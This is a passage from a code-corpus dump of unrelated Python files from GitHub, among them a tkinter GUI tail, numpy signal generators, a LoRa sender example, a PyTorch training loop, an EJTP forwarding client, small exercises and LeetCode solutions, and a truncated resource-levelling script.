somebody*','\t*Mary, John, London, NATO, HBO*','\t*., (, ), ?*','*if, while, that*','*$, %, §, ©, +, −*','\t*run, runs, running, eat, ate, eating*'\n ,'*sfpksdpsxmsa*',''\n ]\n\n tags_rows = []\n desc_rows = []\n examples_rows = []\n \n tags_counter=0\n tags_rowcount=1\n for i in tags_list:\n 
tags_rows.append(ttk.Label(self.posLabelFr, text=i, font = standardtab3LblFont))\n            tags_rows[tags_counter].grid(row=tags_rowcount,column=0)\n            tags_counter+=1\n            tags_rowcount+=1\n        \n        desc_counter=0\n        desc_rowcount=1\n        for i in desc_list:\n            desc_rows.append(ttk.Label(self.posLabelFr, text=i, font = standardtab3LblFont))\n            desc_rows[desc_counter].grid(row=desc_rowcount,column=1)\n            desc_counter+=1\n            desc_rowcount+=1\n        \n        examples_counter=0\n        examples_rowcount=1\n        for i in examples_list:\n            examples_rows.append(ttk.Label(self.posLabelFr, text=i, font = standardtab3LblFont))\n            examples_rows[examples_counter].grid(row=examples_rowcount,column=2)\n            examples_counter+=1\n            examples_rowcount+=1\n        \n        self.root.mainloop()\n    \n    \n    \n    \n    \n    \n    \n# root = tk.Tk()\n# root.geometry('300x200')\n# tabControl = ttk.Notebook(root)\n\n# tab1 = ttk.Frame(tabControl)\n# tab2 = ttk.Frame(tabControl)\n\n# tabControl.add(tab1, text ='Tab 1')\n# tabControl.add(tab2, text ='Tab 2')\n# tabControl.pack(expand = 1, fill =\"both\")\n\n# ttk.Label(tab1, \n#          text =\"Welcome to \\\n#          GeeksForGeeks\").grid(column = 0, \n#                               row = 0,\n#                               padx = 30,\n#                               pady = 30) \n  \n# root.mainloop() \n\ndisplay = Display()\n","repo_name":"Chimeratech-py/trytkinter","sub_path":"trytkinter.py","file_name":"trytkinter.py","file_ext":"py","file_size_in_byte":41267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10019406503","text":"import numpy as np\n\nclass signals:\n    class Sine:\n        def __init__(self, freq, amplitude=1.0, phase=0):\n            self.freq = freq\n            self.amplitude = amplitude\n            self.phase = phase\n\n        def apply(self, sbuf, make_even=True):\n            f = self.freq\n\n            if make_even:\n                f = sbuf.round_freq(f)\n            \n            sbuf.array = self.amplitude * np.exp(1j * (-2.0 * np.pi * f.hz * sbuf.t + self.phase)) \n\n    class ZadoffChu:\n        def __init__(self, N, q, u):\n            self.N = N\n            self.q = q\n            self.u = u\n\n        def apply(self, sbuf, nrepeat=1):\n            cf = self.N % 2\n            n = np.arange(self.N)\n\n            wform = np.exp(-1.0j * np.pi * self.u * n * (n + cf + 2 * self.q) / self.N)\n\n            if nrepeat == -1:\n                nrepeat = sbuf.nsamples // self.N\n            \n            sbuf.array = np.concatenate((np.tile(wform, nrepeat), np.zeros(sbuf.nsamples - nrepeat * len(wform))))\n            \n","repo_name":"pi-radio/piradiod","sub_path":"piradio/jupyter/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43146126982","text":"import pycom\n\nfrom AlLoRa.Nodes.Source import Source\nfrom AlLoRa.Connectors.LoPy4_connector import LoPy4_connector\nfrom AlLoRa.File import CTP_File\nfrom time import sleep\n\n# For testing\nsizes = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]\t#, 1024\nfile_counter = 0\n\ndef clean_timing_file():\n\ttest_log = open('log.txt', \"wb\")\n\ttest_log.write(\"\")\n\ttest_log.close()\n\n\nif __name__ == \"__main__\":\n\n\t# First, we set the connector (basic LoRa-LoPy connection to access the LoPy's LoRa libraries)\n\tconnector = LoPy4_connector()\n\n\t# Then, we set up our Sender Node\n\tlora_node = Source(connector, config_file = \"LoRa.json\")\n\n\t# We turn on a led for a second to know that we are doing ok...\n\tpycom.rgbled(0x1aa7ec) \t# Picton Blue\n\tsleep(1)\n\tpycom.rgbled(0) \t\t# off\n\n\tchunk_size = lora_node.get_chunk_size()\t\t# We use it to create the files to be sent...\n\n\ttry:\n\t\tclean_timing_file()\n\t\tbackup = lora_node.establish_connection()\n\t\tprint(\"Connected!\")\n\n\t\t# This is how to handle a backup 
file if needed (not implemented in this example...)\n\t\tif backup:\n\t\t\tprint(\"Asking backup\")\n\t\t\t#file = Datasource.get_backup()\n\t\t\t#lora_node.restore_file(file)\n\n\t\t# with an established connection, we start sending data periodically\n\t\twhile True:\n\t\t\tif not lora_node.got_file():\n\t\t\t\tn = file_counter % len(sizes)\n\t\t\t\tfile_counter += 1\n\t\t\t\tsize = sizes[n]\n\t\t\t\tprint(\"Setting file\")\n\t\t\t\tpycom.rgbled(0xd74894)\t\t\t\t\t\t\t# Kirby Pink.\n\n\t\t\t\tfile = CTP_File(name = '{}.json'.format(size),\n\t\t\t\t\t\t\t\tcontent = bytearray('{}'.format(n%10)*(1024 * size)),\n\t\t\t\t\t\t\t\tchunk_size=chunk_size)\n\t\t\t\tlora_node.set_file(file)\n\n\t\t\t\tprint(\"New file set, \", file.get_name())\n\t\t\t\tpycom.rgbled(0)\t\t\t\t\t\t\t\t\t# LED off\n\n\t\t\tlora_node.send_file()\n\n\texcept KeyboardInterrupt as e:\n\t\tprint(\"THREAD_EXIT\")\n","repo_name":"SMARTLAGOON/AlLoRa","sub_path":"examples/LoPySender/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"914014748","text":"import csv\nimport six\n\nclass Extra(object):\n \"\"\"\n Base class for things which can be stored in the IVM apart from data sets.\n\n Essentially the only thing an Extra needs to be able to do is be written\n out as a string by implementing __str__\n\n Alternatively an Extra can override the serialize() method which allows\n formatting options to be taken account of.\n\n We also provide a metadata dictionary - ideally extras should write their\n metadata in __str__ but in practice this may not be possible when we want\n the output to be compatible with external programs (e.g. writing out a\n matrix as TSV)\n\n In the future we might expand the Extra base class to define other behaviours,\n e.g. flexible saving to an output file, alternative capabilities... But we\n want to keep things simple for now while we figure out what use can\n be made of them.\n\n Currently the main uses for Extras are:\n\n - Tabular output, e.g. data statistics which we might want to write out to a file\n - Matrix outputs, e.g. 
affine transformations which are the output of a registration\n    \"\"\"\n    def __init__(self, name):\n        self.name = name\n        self.metadata = {}\n\n    def serialize(self, f, **format):\n        text = str(self)\n        f.write(text)\n\nclass NumberListExtra(Extra):\n    \"\"\"\n    Extra which represents a list of numbers\n    \"\"\"\n    def __init__(self, name, values):\n        \"\"\"\n        :param name: Extra name\n        :param values: Sequence of numeric values\n        \"\"\"\n        Extra.__init__(self, name)\n\n        # Check all values are numeric\n        [float(v) for v in values]\n        self.values = values\n\n    def serialize(self, f, **format):\n        sep = format.get(\"sep\", \" \")\n        f.write(sep.join([str(v) for v in self.values]))\n\nclass MatrixExtra(Extra):\n    \"\"\"\n    Extra which represents a 2D matrix with optional row and column headers\n    \"\"\"\n    def __init__(self, name, arr, row_headers=(), col_headers=()):\n        \"\"\"\n        :param name: Extra name\n        :param arr: List-of-lists or 2D Numpy array containing matrix data\n        :param row_headers: Optional sequence of row headers\n        :param col_headers: Optional sequence of column headers\n        \"\"\"\n        Extra.__init__(self, name)\n        if len(arr) == 0:\n            raise ValueError(\"No matrix data given\")\n        if row_headers and len(row_headers) != len(arr):\n            raise ValueError(\"Incorrect number of row headers given\")\n        if col_headers and len(col_headers) != len(arr[0]):\n            raise ValueError(\"Incorrect number of column headers given\")\n\n        self.arr = arr\n        self.row_headers = list(row_headers)\n        self.col_headers = list(col_headers)\n\n    def __str__(self):\n        \"\"\"\n        Convert matrix to a string in TSV format\n        \"\"\"\n        stream = six.StringIO()\n        writer = csv.writer(stream, delimiter='\\t', lineterminator='\\n')\n        if self.col_headers:\n            if self.row_headers:\n                writer.writerow([\" \"] + self.col_headers)\n            else:\n                writer.writerow(self.col_headers)\n\n        for row in self.arr:\n            if self.row_headers:\n                writer.writerow([\" \"] + list(row))\n            else:\n                writer.writerow(list(row))\n\n        return stream.getvalue()\n\nclass DataFrameExtra(Extra):\n    \"\"\"\n    Extra which represents a Pandas data frame\n\n    This is useful for representing general tabular data.\n    \"\"\"\n    def __init__(self, name, df):\n        \"\"\"\n        :param name: Extra name\n        :param df: Pandas data frame containing the tabular data\n        \"\"\"\n        Extra.__init__(self, name)\n        self.df = df\n\n    def __str__(self):\n        stream = six.StringIO()\n        self.df.to_csv(stream, sep='\\t')\n        return stream.getvalue()\n","repo_name":"physimals/quantiphyse","sub_path":"quantiphyse/data/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"16556504562","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution(object):\n    def mergeTrees(self, root1, root2):\n        \"\"\"\n        :type root1: TreeNode\n        :type root2: TreeNode\n        :rtype: TreeNode\n        \"\"\"\n        \n        def dfs(node1, node2): # merge into node1\n            if node1 and node2:\n                node1.val += node2.val\n                node1.left = dfs(node1.left, node2.left)\n                node1.right = dfs(node1.right, node2.right)\n                return node1\n            \n            elif not node1 and node2:\n                return node2\n            else:\n                return node1\n        \n        return dfs(root1, root2) # 173ms(7.83%) / 14,8mb(21.11%)","repo_name":"junhong625/MOCOCO","sub_path":"[9주차] 트리/[LeetCode 617번] Merge Two Binary 
Tress/이정규_나도roo1로병합.py","file_name":"이정규_나도roo1로병합.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"29975817180","text":"#!/usr/bin/env python3\n# RyanWaltersDev Jun 7 2021 -- integers as user inputs\n\n# Return age as a string\n'''\nage = input(\"How old are you? \")\nprint(age)\n'''\n\n# Purposeful error, string cannot compare to int\n'''\nage = input(\"How old are you? \")\nif age >= 18:\n print(\"You are old enough to vote!\")\n'''\n\n# Fix error by int(function)\nage = input(\"How old are you? \")\nage = int(age)\nif age >= 18:\n print(\"You are old enough to vote!\")\nelse:\n print(\"Sorry, you are not old enough to vote.\")\n\n# END OF PROGRAM\n","repo_name":"RyanWaltersDev/NSPython_Chapter7","sub_path":"age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4984939626","text":"walking_minutes = int(input())\nwalks_per_day = int(input())\ncalories_intake = int(input())\n\ncalories_burned = (walking_minutes * walks_per_day) * 5\n\nif calories_burned >= calories_intake / 2:\n print(f\"Yes, the walk for your cat is enough. Burned calories per day: {calories_burned}.\")\nelse:\n print(f\"No, the walk for your cat is not enough. Burned calories per day: {calories_burned}.\")\n","repo_name":"AlexMitev91/py-basics-22","sub_path":"Exam_prep/cat_walking.py","file_name":"cat_walking.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24718362822","text":"import os\nimport random\nimport numpy as np \nimport pickle\nimport torch\nimport torch.nn as nn\nimport torch.utils.data as utils_data\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, roc_curve, auc, roc_auc_score\nimport torch.nn.functional as F\nimport logging\nimport math\nfrom time import time\nfrom sklearn import metrics\nimport pandas as pd\nimport matplotlib\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom debugging_utils import *\nimport kpis\nimport models_functions as mf\nfont = {'size' : 22}\nmatplotlib.rcParams['figure.figsize'] = (18, 12)\nmatplotlib.rc('font', **font)\n\n\ndef eval_top_func(p, model_eval_func, model_kpi_func, model, loss_func_tuple, te_dataset, device, tensorboard = None):\n model = model.to(device)\n \n te_loader = utils_data.DataLoader(dataset = te_dataset, shuffle = True, batch_size = p.BATCH_SIZE, drop_last= True, pin_memory= True, num_workers= 12)\n\n vis_data_path = p.VIS_DIR + p.experiment_tag + '.pickle'\n best_model_path = p.MODELS_DIR + p.experiment_tag + '.pt'\n figure_name = p.experiment_tag\n \n if p.SELECTED_MODEL != 'CONSTANT_PARAMETER':\n model.load_state_dict(torch.load(best_model_path))\n \n print_dict, kpi_dict = eval_model(p, tensorboard, model_eval_func, model_kpi_func, model, loss_func_tuple, te_loader, te_dataset, ' N/A', device, eval_type = 'Test', vis_data_path = vis_data_path, figure_name=figure_name)\n \n print('Test Losses:\\n'+ ''.join(['{}:{}\\n'.format(k, print_dict[k]) for k in print_dict]))\n for k in kpi_dict:\n if 'histogram' not in k:\n print(''.join('{}:{}'.format(k,kpi_dict[k])))\n\n \n return kpi_dict\n\n\ndef train_top_func(p, model_train_func, model_eval_func, model_kpi_func, model,loss_func_tuple, optimizer , tr_dataset, val_dataset, device, tensorboard = None):\n \n \n 
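    # A minimal sketch of the DataLoader pattern used for both datasets below,\n    # assuming a generic torch-style Dataset named ds (ds is a hypothetical name):\n    #   loader = utils_data.DataLoader(dataset=ds, shuffle=True, batch_size=p.BATCH_SIZE,\n    #                                  drop_last=True, pin_memory=True, num_workers=12)\n    # drop_last=True keeps every batch at exactly p.BATCH_SIZE, which eval_model\n    # later relies on via model.batch_size.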
tr_loader = utils_data.DataLoader(dataset = tr_dataset, shuffle = True, batch_size = p.BATCH_SIZE, drop_last= True, pin_memory= True, num_workers= 12)\n val_loader = utils_data.DataLoader(dataset = val_dataset, shuffle = True, batch_size = p.BATCH_SIZE, drop_last= True, pin_memory= True, num_workers= 12)\n \n scheduler = optim.lr_scheduler.StepLR(optimizer, 1, 1)\n \n best_model_path = p.MODELS_DIR + p.experiment_tag + '.pt'\n\n if p.LOWER_BETTER_VAL_SCORE:\n best_val_score = float(\"inf\")\n else:\n best_val_score = 0\n\n patience = p.PATIENCE\n best_epoch = 0\n p.LR_WU_CURRENT_BATCH = 0\n for epoch in range(p.NUM_EPOCHS):\n print(\"===================== Epoch:{} =====================\".format(epoch))\n start = time()\n tr_print_dict = train_model(p, tensorboard, model_train_func, model, loss_func_tuple, optimizer, scheduler, tr_loader, epoch+1, device)\n \n \n if epoch>p.SKIP_VAL_EPOCHS or p.DEBUG_MODE == True:\n val_start = time()\n val_print_dict, val_kpi_dict = eval_model(p, tensorboard, model_eval_func, model_kpi_func, model, loss_func_tuple, val_loader, val_dataset, epoch+1, device, eval_type = 'Validation')\n if p.VAL_SCORE in val_print_dict:\n val_score = val_print_dict[p.VAL_SCORE]\n else:\n val_score = val_kpi_dict[p.VAL_SCORE]\n val_end = time()\n #print(\"Validation Accuracy:\",val_acc,' Avg Pred Time: ', val_avg_pred_time, \" Avg Loss: \", val_loss,\" at Epoch\", epoch+1)\n #if tensorboard != None: \n #if tensorboard != None: \n #if tensorboard != None: \n #tensorboard.add_scalar('tr_total_loss', tr_loss, epoch+1) \n #tensorboard.add_scalar('tr_total_loss', tr_loss, epoch+1) \n #tensorboard.add_scalar('tr_total_loss', tr_loss, epoch+1) \n \n if (p.LOWER_BETTER_VAL_SCORE and val_scorebest_val_score):\n best_val_score = val_score\n best_epoch = epoch\n torch.save(model.state_dict(), best_model_path)\n patience = p.PATIENCE\n else:\n patience -= 1\n end = time()\n tr_print_dict['Total Time'] = end-start\n tr_print_dict['Epoch'] = epoch \n\n val_print_dict['Validation Time'] = val_end-val_start\n val_print_dict['Best Epoch'] = best_epoch\n val_print_dict['Best Val Score ({})'.format(p.VAL_SCORE)] = best_val_score\n \n print('Training Metrics:\\n'+ ''.join(['{}:{}\\n'.format(k,tr_print_dict[k]) for k in tr_print_dict]))\n print('Validation Metrics:\\n'+ ''.join(['{}:{}\\n'.format(k,val_print_dict[k]) for k in val_print_dict]))\n \n for k in tr_print_dict:\n tensorboard.add_scalar('Train_epoch_' + k, tr_print_dict[k], epoch)\n for k in val_print_dict:\n tensorboard.add_scalar('Validation_epoch_' + k, val_print_dict[k], epoch)\n \n print('Validation KPIs:\\n')\n for k in val_kpi_dict:\n \n if 'histogram' not in k:\n print(''.join('{}:{}'.format(k,val_kpi_dict[k])))\n \n if 'histogram' in k:\n tensorboard.add_histogram('Validation_epoch_' + k, val_kpi_dict[k], epoch)\n continue\n elif ('group' not in k) and ('min' not in k) and('mnll' not in k) :\n tensorboard.add_scalar('Validation_epoch_' + k, val_kpi_dict[k], epoch)\n if p.DEBUG_MODE == True:\n print('Debugging Mode Active.')\n break\n\n if patience == 0:\n print(' No performance improvement in Validation data after:', epoch+1, 'Epochs!')\n break\n else:\n end = time()\n tr_print_dict['Total Time'] = end-start\n tr_print_dict['Epoch'] = epoch \n \n print('Training Metrics:\\n'+ ''.join(['{}:{}\\n'.format(k,tr_print_dict[k]) for k in tr_print_dict]))\n \n for k in tr_print_dict:\n tensorboard.add_scalar('Train_epoch_' + k, tr_print_dict[k], epoch)\n \n \n \n \n \n\n result_dic = {\n 'EarlyStopping Epoch': best_epoch + 1,\n 'Best 
Validation Loss': best_val_score,\n }\n return result_dic\n\n\ndef train_model(p, tb, model_train_func, model, loss_func_tuple, optimizer, scheduler, train_loader, epoch, device, vis_step = 20):\n # Number of samples with correct classification\n # total size of train data\n # number of batch\n model_time = 0\n\n all_start = time()\n model.train()\n vis_print_dict = []\n print_dict = []\n # Training loop over batches of data on train dataset\n for batch_idx, (data_tuple, labels,_, _) in enumerate(train_loader):\n \n if p.DEBUG_MODE == True:\n if batch_idx >50: ##Uncoment for debuggering\n break\n \n data_tuple = [data.to(device) for data in data_tuple]\n label_tuple = (labels.to(device),)\n \n # 1. Clearing previous gradient values.\n optimizer.zero_grad()\n \n # 2. Run the Model \n #print(model_train_func)\n loss, batch_print_info_dict = model_train_func(p, data_tuple, label_tuple, model, loss_func_tuple, device)\n\n # 3. Calculating new grdients given the loss value\n loss.backward()\n\n # 4. Updating the weights\n if p.LR_WU and p.LR_WU_CURRENT_BATCH<=p.LR_WU_BATCHES:\n p.LR_WU_CURRENT_BATCH +=1\n lr = p.LR*p.LR_WU_CURRENT_BATCH/p.LR_WU_BATCHES\n for g in optimizer.param_groups:\n g['lr'] = lr\n else:\n p.LR_WU_CURRENT_BATCH +=1\n lr = p.LR/math.sqrt(p.LR_WU_CURRENT_BATCH+1)\n for g in optimizer.param_groups:\n g['lr'] = lr\n\n optimizer.step()\n # For epoch level printing\n if batch_idx == 0:\n print_dict = batch_print_info_dict\n else:\n for k in print_dict:\n print_dict[k] += batch_print_info_dict[k]/len(train_loader)\n \n # Every X batch print vis_print_dict\n if batch_idx % 500 == 0:\n if batch_idx !=0:\n print('Training Epoch: {}, Batch: {}/{}\\n'.format(epoch, batch_idx, len(train_loader))+ ''.join(['{}:{}\\n'.format(k,vis_print_dict[k]) for k in vis_print_dict]))\n for k in vis_print_dict:\n tb.add_scalar(k, vis_print_dict[k], epoch*(int(len(train_loader)/500)) + int(batch_idx/500))\n vis_print_dict = batch_print_info_dict\n else:\n for k in vis_print_dict:\n vis_print_dict[k] += batch_print_info_dict[k]/500\n \n all_end = time()\n all_time = all_end - all_start\n \n \n \n return print_dict\n \ndef eval_model(p, tb, model_eval_func, model_kpi_func, model, loss_func_tuple, test_loader, test_dataset, epoch, device, eval_type = 'Validation', vis_data_path = None, figure_name = None):\n total = len(test_loader.dataset)\n #print('Total test data',total)\n #exit()\n num_batch = int(np.floor(total/model.batch_size))\n # Initialise Variables\n \n plot_dicts = []\n print_dict = {}\n kpi_input_dict = {}\n #model.eval()\n for batch_idx, (data_tuple, labels, plot_info, _) in enumerate(test_loader):\n if p.DEBUG_MODE == True:\n if batch_idx >2: \n break\n \n \n data_tuple = [data.to(device) for data in data_tuple]\n label_tuple = (labels.to(device),)\n with torch.no_grad():\n batch_print_info_dict, batch_kpi_input_dict = model_eval_func(p, data_tuple, plot_info, test_dataset, label_tuple, model, loss_func_tuple, device, eval_type)\n\n \n if batch_idx == 0:\n for k in batch_kpi_input_dict:\n kpi_input_dict[k] = [batch_kpi_input_dict[k]]\n for k in batch_print_info_dict:\n print_dict[k] = batch_print_info_dict[k]\n else:\n for k in batch_kpi_input_dict:\n kpi_input_dict[k].append(batch_kpi_input_dict[k])\n \n for k in batch_print_info_dict:\n print_dict[k] += batch_print_info_dict[k]/len(test_loader)\n \n if (batch_idx+1) % 500 == 0:\n print('Epoch: ',epoch, ' Batch: ', batch_idx+1, '/{}'.format(len(test_loader)))\n \n kpi_dict = model_kpi_func(p, kpi_input_dict, 
test_dataset.output_states_min, test_dataset.output_states_max, figure_name)\n if eval_type == 'Test':\n with open(vis_data_path, \"wb\") as fp:\n pickle.dump(kpi_input_dict, fp)\n \n return print_dict, kpi_dict\n\n\n \n\n\n\n","repo_name":"SajjadMzf/TrajPred","sub_path":"training_functions.py","file_name":"training_functions.py","file_ext":"py","file_size_in_byte":10797,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"4913808101","text":"from typing import List\n\n\nclass Solution:\n def largestDivisibleSubset(self, nums: List[int]) -> List[int]:\n nums.sort()\n\n dp = dict()\n dp[nums[0]] = [nums[0]]\n global_max = [nums[0]]\n\n for i in range(1, len(nums)):\n maxi = []\n for j in range(0, i):\n if nums[i] % nums[j] == 0:\n if len(dp[nums[j]]) > len(maxi):\n maxi = dp[nums[j]].copy()\n maxi.append(nums[i])\n dp[nums[i]] = maxi\n if len(maxi) > len(global_max):\n global_max = maxi\n\n return global_max","repo_name":"fzdy1914/leetcode","sub_path":"dynamic-programming/368-largest-divisible-subset.py","file_name":"368-largest-divisible-subset.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72213561426","text":"'''\nThis file is part of the Python EJTP library.\n\nThe Python EJTP library is free software: you can redistribute it \nand/or modify it under the terms of the GNU Lesser Public License as\npublished by the Free Software Foundation, either version 3 of the \nLicense, or (at your option) any later version.\n\nthe Python EJTP library is distributed in the hope that it will be \nuseful, but WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser Public License for more details.\n\nYou should have received a copy of the GNU Lesser Public License\nalong with the Python EJTP library. If not, see \n.\n'''\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom persei import RawData\n\nfrom ejtp.client import Client\nfrom ejtp import frame\nfrom ejtp.util.hasher import make as hashfunc\n\nclass ForwardClient(Client):\n def __init__(self, router, interface, serveraddr, **kwargs):\n '''\n Client side for EJForward protocol. 
Takes server address as constructor arg.\n '''\n Client.__init__(self, router, interface, **kwargs)\n self.serveraddr = serveraddr\n self._status = {}\n self._status_callbacks = []\n\n def rcv_callback(self, msg, client_obj):\n data = msg.unpack()\n mtype = data['type']\n if mtype=='ejforward-notify':\n self._status = data\n for callback in self._status_callbacks:\n callback(self)\n self._status_callbacks = []\n elif mtype=='ejforward-message':\n internal = RawData(data['data'])\n self.ack([hashfunc(internal)])\n try:\n self.send(frame.createFrame(internal)) # forward to router\n except ValueError:\n logger.warning(\"Invalid frame, discarding\")\n else:\n logger.warning(\"Unknown message type, %r\" % mtype)\n\n def ack(self, hashes):\n self.upload(\n 'ejforward-ack',\n {\n 'hashes': list(hashes),\n },\n )\n\n def retrieve(self, hashes=None):\n '''\n Get the current status according to the server.\n '''\n self.upload(\n 'ejforward-retrieve',\n {\n 'hashes': list(hashes),\n },\n )\n\n def get_status(self, callback=None):\n '''\n Get the current status according to the server.\n '''\n if callback:\n self._status_callbacks.append(callback)\n self.upload(\n 'ejforward-get-status',\n {},\n )\n\n def upload(self, dtype, data):\n '''\n Send a message to the server.\n '''\n data['type'] = dtype\n self.write_json(self.serveraddr, data)\n\n @property\n def status(self):\n return self._status\n","repo_name":"campadrenalin/EJTP-lib-python","sub_path":"ejtp/applications/ejforward/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"71695839507","text":"import osm2graph\nimport pickle\n\ndef main():\n coords = osm2graph.get_coords_by_id()\n compr = osm2graph.compress_coords(coords)\n ways = osm2graph.get_ways(coords)\n pickle.dump(coords, open('coord.dump', 'wb'))\n pickle.dump(compr, open('compr.dump', 'wb'))\n pickle.dump(ways, open('ways.dump', 'wb'))\n\nmain()\n","repo_name":"dimazilla123/moscow-road-remove","sub_path":"coord_dump.py","file_name":"coord_dump.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31498531952","text":"\n\n\n\n\n\n# Here we get an int input from the user\nnum = int(input(\"Pick a number: \"))\n\n# Here we just made a vribaile that spits out what the octal number od the decimal number of the picked number is \nfinal_words = 'The octal number of decimal number: '\n\n# Here we're is printing what needs to be done\nprint(final_words, '%o' % num)\n","repo_name":"MoeTheBeast/Programming-journal","sub_path":"Input_Output_Exercises/Ex3.py","file_name":"Ex3.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26542067075","text":"import itertools\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--train\", type=str, help=\"add the path to the csv for the training data subset\", required=True)\nargs = parser.parse_args()\n\ntrain = pd.read_csv(args.train)\n\n# dictionary where we will track sentences and their duplicates\nduplicates = {}\n\n# loop through every unique sentence in the training set\nfor sentence in train['sentence'].unique():\n\n # get the indices of the rows where this sentence occurs\n indices = train.index[train['sentence'] == sentence].tolist()\n\n # add the sentence and its 
corresponding indices to the dictionary\n duplicates[sentence] = indices\n\n# we create the experiment training sets with the repeated instances of each item \none2one = []\none2two = []\none2four = []\none2eight = []\n\nfor dups in duplicates.values():\n one2one.append(dups[0:1])\n one2two.append(dups[0:2])\n one2four.append(dups[0:4])\n one2eight.append(dups[0:8])\n\none2one = [item for sublist in one2one for item in sublist]\none2two = [item for sublist in one2two for item in sublist]\none2four = [item for sublist in one2four for item in sublist]\none2eight = [item for sublist in one2eight for item in sublist]\n\n# save csv files of our experiment training sets\ntrain.iloc[one2one].to_csv('experiment_data/one2one_train.csv', index=True)\ntrain.iloc[one2two].to_csv('experiment_data/one2two_train.csv', index=True)\ntrain.iloc[one2four].to_csv('experiment_data/one2four_train.csv', index=True)\ntrain.iloc[one2eight].to_csv('experiment_data/one2eight_train.csv', index=True)\n","repo_name":"Witty-Kitty/common_voice_prep","sub_path":"preparation_scripts/experiment0_prep.py","file_name":"experiment0_prep.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31552353469","text":"import itertools\nimport numpy as np\n\nfrom cpm import *\n\n\nclass BurgessProcedure:\n\n\tdef __init__(self, node_matrix=[]):\n\t\tself.node_matrix = node_matrix\n\t\tself.critical_activities = [] #List Or Array#\n\t\tself.critical_activities_length = 0\n\t\tself.nonCritical_activities = {}\n\t\tself.delay_activity_resluts = {}\n\t\tself.delay_activity_r = {}\n\t\tself.delay_activity_r2 = {} #Dictionary Or Map#\n\t\tself.project_duration = 0\n\t\tself.nonCritical_activities_length = 0\n\t\tself.optimal_time_resource_matrix = None\n\t\tself.optimal_total_R = int(1e9)\n\t\tself.optimal_total_R_square = int(1e9)\n\t\t# print('- Node_Matrix -\\n', self.node_matrix)\n\t\n\n\tdef print_burgess_schedule_details(self):\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"Optimal Result\", self.optimal_total_R_square)\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"Name\\tOS\\tOF\\tShift \\tR^2 \\tSUM(R)\\tSUM(R^2)\")\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == True:\n\t\t\t\tprint(node[\"name\"], \"\\t\", node[\"OS\"], \"\\t\", node[\"OF\"], \"\\t\", int(node[\"OS\"])-int(node[\"ES\"]))\n\t\t\telse:\n\t\t\t\tprint(node[\"name\"], \"\\t\", node[\"OS\"], \"\\t\", node[\"OF\"], \"\\t\", int(node[\"OS\"])-int(node[\"ES\"]),\"\\t\",\n\t\t\t\tself.delay_activity_resluts[node[\"name\"]], \"\\t\", self.delay_activity_r[node[\"name\"]], \"\\t\", self.delay_activity_r2[node[\"name\"]])\n\n\n\tdef initialize_OS_OF(self):\n\t\tfor node in self.node_matrix:\n\t\t\tnode[\"OS\"] = node[\"ES\"] \n\t\t\tnode[\"OF\"] = node[\"EF\"]\n\n\n\tdef separate_critical_activities(self):\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == True:\n\t\t\t\tself.project_duration += int(node[\"duration\"])\n\t\t\t\tself.critical_activities.append(node)\n\n\n\tdef generate_time_resource_matrix(self):\n\t\tallotted_resources_for_cp = np.zeros(self.project_duration + 1, dtype=int)\n\n\t\tfor ca in self.critical_activities:\n\t\t\tfor ind, value in enumerate(allotted_resources_for_cp):\n\t\t\t\tif ind > int(ca[\"ES\"]) and ind <= int(ca[\"EF\"]):\n\t\t\t\t\tallotted_resources_for_cp[ind] = value + 
